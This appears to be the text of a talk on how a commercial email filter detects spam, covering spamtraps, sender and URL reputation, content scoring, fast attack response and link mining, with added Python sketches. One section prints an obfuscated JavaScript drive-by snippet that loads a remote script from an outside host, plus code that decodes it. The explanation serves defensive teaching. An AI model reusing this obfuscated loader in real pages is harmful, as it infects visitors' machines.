Email filtering: A view from the inside
Tom Fawcett, Machine Learning Architect, Proofpoint, Inc.
tfawcett@acm.org
Typical data mining view of spam filtering
Email corpus (ham + spam) → content extraction, pre-processing → bag-of-words representation → induction algorithm (support vector machines, random forests, ensemble methods, etc.) → two-class model → cross-validation on a test set → 99% accuracy! Spam filtering is easy!

Example message:
From: "Latasha Gunter" <2nlni7jkcv2@audit.net>
To: Tom Fawcett <tfawcett@acm.org>
Subject: its been p r o v e n l qnvyvrnpztc
100% Guaranteed to Work! Our Male Enlargement Pill is the most effective on the medical market today with over a Million satisfied customers worldwide!

Bag-of-words counts: the: 72, male: 7, pill: 4, medical: 2, market: 1
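This textbook pipeline can be sketched in a few lines. Below is a hypothetical, stdlib-only illustration of the bag-of-words step; the tokenizer regex and sample text are my own, not the talk's:

```python
# Minimal bag-of-words sketch: tokenize, lowercase, count term frequencies.
# A real pipeline would feed these counts to an induction algorithm
# (SVMs, random forests, etc.) and evaluate with cross-validation.
from collections import Counter
import re

def bag_of_words(text):
    """Return term counts, e.g. {'the': 2, 'pill': 1, ...}."""
    return Counter(re.findall(r"[a-z']+", text.lower()))

msg = ("100% Guaranteed to Work! Our Male Enlargement Pill is the most "
       "effective on the medical market today")
counts = bag_of_words(msg)
print(counts["the"], counts["pill"])
```

Each distinct term becomes one feature dimension; on a static corpus this representation alone gets a classifier most of the way to the headline accuracy.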
Real spam filtering is tough
- Huge proportion of email is spam (> 90% at some sites)
- Heterogeneous email stream (Proofpoint has thousands of customers: different languages, different countries, different topics)
- Not just text. Virtually infinite representation space: text, HTML, Javascript, images.
- Types of errors are different and important.
- Strict performance requirements (service agreement: 1 FP in 350K msgs)
- Demanding processing requirements (100-200K messages/hr./appliance)
- Fundamental noise: spam looks like bulk, spam looks like ham, phishing looks like ham; ham looks like spam.
- Words aren't enough: not enough information.
- Constantly changing: spam campaigns come and go.
- Constantly changing: intelligent, adaptive adversaries.
Real spam filtering is tough (cont'd)
- Need for fast response. As soon as we see an attack, our customers see it too.
- Classification process must be transparent. Human analysts must explain, analyze and correct spam decisions. Models must be white-box and understandable.
- Strict privacy concerns. We scan everything, but we can't keep it.
Types of data mining environments
- Static. Fixed patterns, fixed model. If the data source is a stream, the series is stationary.
- Dynamic. Concept drift; non-stationary streams. A set of disjuncts makes up the concept; have to decide when one is changing and how to adjust the model(s).
- Adversarial. Feedback loop with the environment. Drifting concept, driven by an adversary who is actively trying to defeat the model. Interacting complex adaptive systems (some chaotic dynamics). Relevant theory: economics, game theory, complex systems theory.
Adversarial domains are everywhere
Valuable asset + intelligent agents + large playing field = ARMS RACE
- Cellphone fraud / detection
- Blog spam, tweet spam
- Credit card fraud / detection
- Advertising / ad blocking
- Cracking / intrusion detection
- CAPTCHAs / CAPTCHA breaking
- Email spam / filtering
- Viruses / antivirus products
- Click fraud
- Phishing / detection
- Games
- Product review spam / detection & culling
- User tracking technology / privacy guards
- Music sharing / torrent poisoning
The nature of the game and the agents' intelligence determine the dynamics.
Types of email we distinguish: some terminology
- Bulk email: like spam, but desired and (presumably) requested.
- Spam: unsolicited commercial email.
- Viruses: attachments and drive-by downloads.
- Phishing: impersonating a legit sender to get the recipient to divulge sensitive information.
Spam, viruses and phishing are all treated as "spam":
- Legit email = ham = negative class (not a threat)
- Illegit email = spam = positive class (threat, alarm)
So errors are:
- False positives = false alarms (legit email thrown away)
- False negatives = spam that got through the filters
Where we get (training) data
- Historical (static) collections of ham and spam.
- Spamtraps: machines on the internet that receive no legitimate email.
- Honeypoints: addresses on customer machines that receive only spam.
(Spamtraps and honeypoints are sources of 100% spam.)
- False positives and false negatives reported by customers.
Spamtraps
Email transmission process (dialog between the inbound sender and the mail host/MTA, which is responsible for filtering and delivery):

HELO relay.example.org
250 Hello relay.example.org, glad to meet you
MAIL FROM:<bob@example.org>
250 Ok
RCPT TO:<alice@example.com>
250 Ok
RCPT TO:<theboss@example.com>
250 Ok
DATA
Return-Path: bounce@inbound.teach12.net
Received: from imta31.westchester.pa.mail.comcast.net (LHLO imta31.westchester.pa.mail.comcast.net) (76.96.59.249) by sz0150.ev.mail.comcast.net with LMTP; Thu, 21 Oct 2010 16:29:53 +0000 (UTC)
Received: from ttcmailer01.teach12.net ([63.146.114.254]) by imta31.westchester.pa.mail.comcast.net with comcast id MUV31f0055VPXW70XUVSzl; Thu, 21 Oct 2010 16:29:54
Date: Thu, 21 Oct 2010 12:26:43 -0400
To: tom.fawcett@comcast.net
From: "The Teaching Company" <teaching_company@teach12.net>
...
You have received this email because you are a valued Teaching Company customer. Your email address is never rented, sold, or loaned to anyone else. ...
250 Ok
Email components: what we have to work with
- HELO relay.example.org: machine name and IP address of the immediate upstream server.
- MAIL FROM:<bob@example.org>: return address; probably forged if spam.
- RCPT TO:<alice@example.com>, RCPT TO:<theboss@example.com>: recipients.
- Mail body; any portion can be forged:
  - Received lines, presumably indicating where the message has been and how it's been routed. Often forged in spam.
  - Sender and recipient headers (Return-Path, Date, To, From), e.g.:
    Return-Path: bounce@inbound.teach12.net
    Received: from imta31.westchester.pa.mail.comcast.net (LHLO imta31.westchester.pa.mail.comcast.net) (76.96.59.249) by sz0150.ev.mail.comcast.net with LMTP; Thu, 21 Oct 2010 16:29:53 +0000 (UTC)
    Received: from ttcmailer01.teach12.net ([63.146.114.254]) by imta31.westchester.pa.mail.comcast.net with comcast id MUV31f0055VPXW70XUVSzl; Thu, 21 Oct 2010 16:29:54
    Date: Thu, 21 Oct 2010 12:26:43 -0400
    To: tom.fawcett@comcast.net
    From: "The Teaching Company" <teaching_company@teach12.net>
  - Body: text, HTML, etc.
  - Attachments: zero or more.
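These components can be pulled out of a raw message with Python's standard email parser. A minimal sketch (the sample headers are abbreviated, and remember that any of them may be forged):

```python
# Parse a raw RFC 822 message and extract the parts the filter works with.
from email import message_from_string

raw = """\
Return-Path: bounce@inbound.teach12.net
Received: from ttcmailer01.teach12.net ([63.146.114.254]) by imta31.example.net
Received: from imta31.example.net by mx.example.com
To: tom.fawcett@comcast.net
From: "The Teaching Company" <teaching_company@teach12.net>
Subject: Your order

Body text here.
"""

msg = message_from_string(raw)
received = msg.get_all("Received")   # routing trail; often forged in spam
body = msg.get_payload()             # text/HTML body (attachments if multipart)
print(len(received), msg["From"])
```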
Email scanning process: overview
Inbound email connection →
1. IP (connection) scoring → Reject?
2. Header extraction, content parsing, domain (URL) extraction
3. Domain reputation/scoring, social network analysis (SNA) → Reject?
4. Content scoring → Reject?
→ Deliver
Utility-based classification: general increase in cost / decrease in utility at each successive stage.

Example inbound message:
Delivered-To: em-ca-bruceg@em.ca
Received: (qmail 4406 invoked from ...)
Received: from dunwoody-dobson.ie by churchill.factcomp.com with ESMTP via TCP; 01 Dec 2009
From: "Lyles X Alisa" <Crosbyxjtovbgw@...>
To: henrietta96@aol.com
Cc: amvimdypet@fufutmadje.com
Return-Path: Crosbyxjtovbgw@mailpro...
IP (sender) scoring: who's sending this email?
- Reputation model: every inbound sender's IP address is evaluated.
- Internal factors (who in our network is getting email from this IP? How much email? How much spam? etc.)
- External factors (How long has this IP been around? What subnet/country? Who is it registered to?)
- Factors are quantified and provided to a classifier.
- Classifier has several actions: Accept, Reject, Throttle, Discard.
- Statistics are updated quickly and shared.
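A toy version of the idea: internal and external factors are quantified into a feature vector, scored, and mapped to an action. The feature names, weights, and thresholds below are invented for illustration and are not Proofpoint's model:

```python
# Hypothetical IP reputation scorer: hand-set linear model over a few
# illustrative internal/external features, mapped to filtering actions.
def ip_features(stats):
    return [
        stats["spam_ratio"],           # internal: fraction of msgs flagged spam
        stats["msgs_per_hour"] / 1e4,  # internal: traffic volume, normalized
        1.0 / (1 + stats["age_days"]), # external: brand-new IPs are riskier
    ]

WEIGHTS = [0.7, 0.2, 0.1]

def ip_score(stats):
    return sum(w * f for w, f in zip(WEIGHTS, ip_features(stats)))

def action(score, reject=0.8, throttle=0.5):
    if score >= reject:
        return "Reject"
    return "Throttle" if score >= throttle else "Accept"

print(action(ip_score({"spam_ratio": 0.99, "msgs_per_hour": 20000, "age_days": 0})))
```

In practice the model would be trained, and the statistics behind the features refreshed continuously and shared across the network.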
Domain (URL) scoring: what are they pointing back to?
- URL classification is critical. URLs are how most spammers provide links to their wares (Click <A HREF=...>HERE</A> to buy!)
- Every URL is extracted from each email message and evaluated.
- URLs are evaluated similarly to IPs but with slightly different criteria, e.g., who registered this domain and for how long; who is the name server, etc.
- A classifier is used to condemn URLs, which in turn can cause an email to be rejected.
- Spammers know URLs are watched, so they use public resources: Google Groups, bit.ly, etc.
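A minimal sketch of the extraction step, assuming simple double-quoted href attributes (production parsers handle far messier HTML than this regex does):

```python
# Pull every link out of an HTML body and reduce it to the host name,
# which is what the domain-reputation classifier actually scores.
import re
from urllib.parse import urlparse

def extract_domains(html):
    urls = re.findall(r'href="(http[^"]+)"', html, flags=re.IGNORECASE)
    return [urlparse(u).hostname for u in urls]

body = 'Click <A HREF="http://cheap-meds.example/buy">HERE</A> to buy!'
print(extract_domains(body))
```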
Content scoring
- Regular expression parsing (SpamAssassin rules + Proofpoint rule set)
- Very large lexicon (~1 million entries): words, phrases, URLs, rules and terms
- Trained by modified logistic regression (binomial assumption) over ~300K inputs: words, phrases, regexps
- In use, produces a normalized score between 0 and 100.
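A toy illustration of the scoring scheme: lexicon hits feed a logistic model whose output is scaled to the 0-100 range. The lexicon entries, weights, and bias below are made up:

```python
# Logistic content scorer: sum lexicon weights for matched terms,
# squash through a sigmoid, scale to 0..100.
import math

LEXICON = {"enlargement": 2.1, "guaranteed": 1.4, "meeting": -0.9}
BIAS = -3.0

def content_score(tokens):
    z = BIAS + sum(LEXICON.get(t, 0.0) for t in tokens)
    return 100.0 / (1.0 + math.exp(-z))   # logistic, scaled to 0..100

ham = content_score("see you at the meeting".split())
spam = content_score("enlargement guaranteed enlargement".split())
print(round(ham, 1), round(spam, 1))
```

The real system has ~300K inputs and a modified training procedure, but the shape of the computation at scoring time is this simple.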
(Why use simple classifiers?)
- Needs to be explainable, modifiable.
- Representation can (should?) incorporate many attribute interactions.
- Empirically unnecessary (R² ≈ 0.95): no advantage from more complex models.
- Need for space and time efficiency.
Disjuncts of a spam stream
Spam term frequency chi-squared tests per week of 2002 show three behaviors:
1: Relatively stable/static
2: Seasonal/periodic
3: Episodic spiking
From "In vivo" spam filtering: A challenge problem for data mining. Tom Fawcett, KDD Explorations vol. 5 no. 2, December 2003.
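The per-week drift test can be reproduced by hand: compare a term's observed weekly counts against a flat baseline with a chi-squared goodness-of-fit statistic. The counts below are invented to contrast a stable term with an episodic spike:

```python
# Chi-squared goodness-of-fit of weekly term counts vs. a uniform baseline.
def chi2(counts):
    expected = sum(counts) / len(counts)
    return sum((o - expected) ** 2 / expected for o in counts)

stable = chi2([40, 42, 38, 41, 39, 40])      # type 1: stable/static term
episodic = chi2([40, 42, 38, 41, 300, 39])   # type 3: episodic spiking
print(round(stable, 2), round(episodic, 1))
```

A small statistic means the term's frequency is consistent week to week; a large one flags exactly the episodic disjuncts that force model updates.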
Data mining classifier update cycles
- Main cycles (24 hrs): lexicon consolidation, weight training, etc.
- Fast attack response (~15 min cycles): new attacks are examined and the lexicon is updated.
Fast attack learning & response (NB: the primary change is to the representation, not to the model)
1. A dip in the TP rate on a spamtrap signifies an attack that is not being handled by the classifier.
2. False negatives (low-scoring spam messages) are downloaded from spamtraps.
3. Messages are parsed and dissected (URL, email extraction, etc.)
4. Messages are clustered by text contents.
5. In consultation with the lexicon, characteristic terms are extracted from the clusters (e.g., "good cheap Canadian meds", "lowest mortgage rates in years").
6. New lexicon entries are pushed out to customer sites, along with weight estimates, to be integrated into the classifier.
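Steps 4-5 can be sketched with a hand-rolled greedy clusterer over word overlap; a real system would use proper clustering (e.g. k-means over TF-IDF vectors). The messages and threshold here are illustrative:

```python
# Cluster low-scoring spam by shared vocabulary, then extract the
# terms that characterize each cluster as candidate lexicon entries.
from collections import Counter

messages = [
    "good cheap canadian meds shipped fast",
    "cheap canadian meds no prescription",
    "lowest mortgage rates in years act now",
    "mortgage rates at lowest point in years",
]

def jaccard(a, b):
    a, b = set(a.split()), set(b.split())
    return len(a & b) / len(a | b)

# greedy single-pass clustering on word overlap
clusters = []
for m in messages:
    for c in clusters:
        if jaccard(m, c[0]) > 0.3:
            c.append(m)
            break
    else:
        clusters.append([m])

def characteristic_terms(cluster, k=3):
    counts = Counter(w for m in cluster for w in m.split())
    return [w for w, _ in counts.most_common(k)]

for c in clusters:
    print(characteristic_terms(c))
```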
Text models aren't enough
- Intentional misspelling (V1a.gr@, ViaggrA, C1ALYS, etc.)
- Inherent overlap/noise (CIALYS)
- The difference is often intention: Did you request this info? Do you want this ad?
- Too easy to get around text!
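One standard counter to intentional misspelling is normalizing common character substitutions before lexicon lookup. This tiny sketch uses an illustrative substitution table, not the real rule set:

```python
# Map leet-style substitutions back to letters and drop inserted dots,
# so an obfuscated token collapses back to a lexicon entry.
def normalize(word):
    table = str.maketrans("10@$", "ioas")
    return word.lower().translate(table).replace(".", "")

print(normalize("V1a.gr@"))   # -> viagra
```

Of course this is an arms race too: each normalization rule just pushes spammers toward obfuscations the rule set doesn't cover yet.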
Text models aren't enough: on your screen vs. the source

On your screen: the rendered page.

Source:
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/tr/html4/strict.dtd">
<html> <head> </head> <body>
<table border="0" cellpadding="0" cellspacing="0" width="600"> <tbody> <tr>
<td bgcolor="#999999" width="1"><img src="http://graphics.nytimes.com/images/misc/spacer.gif" border="0" height="1" width="1"></td>
<td width="1"><img src="http://graphics.nytimes.com/images/misc/spacer.gif" border="0" height="1" width="1"></td>
<td width="598"> <table border="0" cellpadding="0" cellspacing="0" width="598"> <tbody>
etc. ...

Behind the scenes:
<script type="text/javascript">
<!--
var s="=tdsjqu!tsd>#iuuq;00dpmpsepops/dpn0jgsbnfgjmf/kt#?=0tdsjqu?";
var m="";
for (i=0; i<s.length; i++) m += String.fromCharCode(s.charCodeAt(i)-1);
document.write(m);
//-->
</script>

which writes out:
<script src="http://colordonor.com/iframefile.js"></script>

You're infected.
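The obfuscation above is just a character shift: each code point in the string is one above the real payload. Reproducing the decode in Python shows what the victim's browser actually executes:

```python
# Undo the +1 code-point shift used by the obfuscated script above.
s = "=tdsjqu!tsd>#iuuq;00dpmpsepops/dpn0jgsbnfgjmf/kt#?=0tdsjqu?"
decoded = "".join(chr(ord(ch) - 1) for ch in s)
print(decoded)
# -> <script src="http://colordonor.com/iframefile.js"></script>
```

No bag-of-words feature on the visible text will ever see that URL; the filter has to execute or decode the content to find it.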
Network effects: cell phone fraud
- A dialed-digits detector: network connections can be used to classify/identify people.
- Fraud detection: how closely does a calling pattern match a known fraudulent one?
- Anomaly detection: how different is a pattern from a known legit one?
- Given a new pattern: fraudulent or legit?
Link mining and network analysis
Link mining may be used to identify spam by estimating p(spam | a, b, c, d):
- Identifying anomalous, low-probability links between recipients (spoofed names, compromised accounts, etc.)
- Identifying anomalous links between individuals in organizations.
- Identifying known bad email addresses and the messages that link to them.
- Linking IPs with countries and subnets; domains with nameservers, etc.
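A toy version of the first signal: recipient pairs never seen together in the historical communication graph are flagged as anomalous, low-probability links. The history and names below are invented:

```python
# Flag recipient pairs that have no edge in the historical graph.
from itertools import combinations

# historical co-occurrence graph of recipient pairs
history = {frozenset(p) for p in [("alice", "bob"), ("alice", "carol")]}

def anomalous_pairs(recipients):
    return [p for p in combinations(sorted(recipients), 2)
            if frozenset(p) not in history]

print(anomalous_pairs(["alice", "bob", "dave"]))
```

A production system would estimate link probabilities rather than use a binary seen/unseen test, but the structure of the signal is the same.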
[End]